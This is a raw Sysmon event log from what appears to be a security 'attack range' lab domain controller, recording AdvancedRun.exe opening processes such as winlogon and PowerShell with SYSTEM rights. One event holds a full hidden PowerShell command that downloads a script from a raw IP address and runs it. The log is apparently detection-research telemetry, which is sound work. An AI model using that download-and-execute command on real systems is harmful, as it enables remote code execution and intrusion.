734700x80000000000000004080287Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.829{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=CA7A58C10B61327C283100DD9277811A,SHA256=13D357E647DB3DFDFE35C56E4CC78244B35647CCA53D34F94F318DA7C848E09FtrueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004080286Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.826{834264DD-DAE6-61EA-0D00-000000002702}8761012C:\Windows\system32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
734700x80000000000000004080285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.823{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=21062367FEB4D61857A65449EA516260,SHA256=FA481B495A9FE2E3E78173C9B065E4292911A1CD403D90A03058A54309366D17trueMicrosoft WindowsValidATTACKRANGE\Administrator
154100x80000000000000004079786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.841{834264DD-14D0-61EB-A008-000000002702}5124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runATTACKRANGE\Administrator
10341000x80000000000000004079785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.839{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004079784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.839{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004079783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.834{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.834{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9808-000000002702}5860C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.834{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9708-000000002702}2972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079773Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 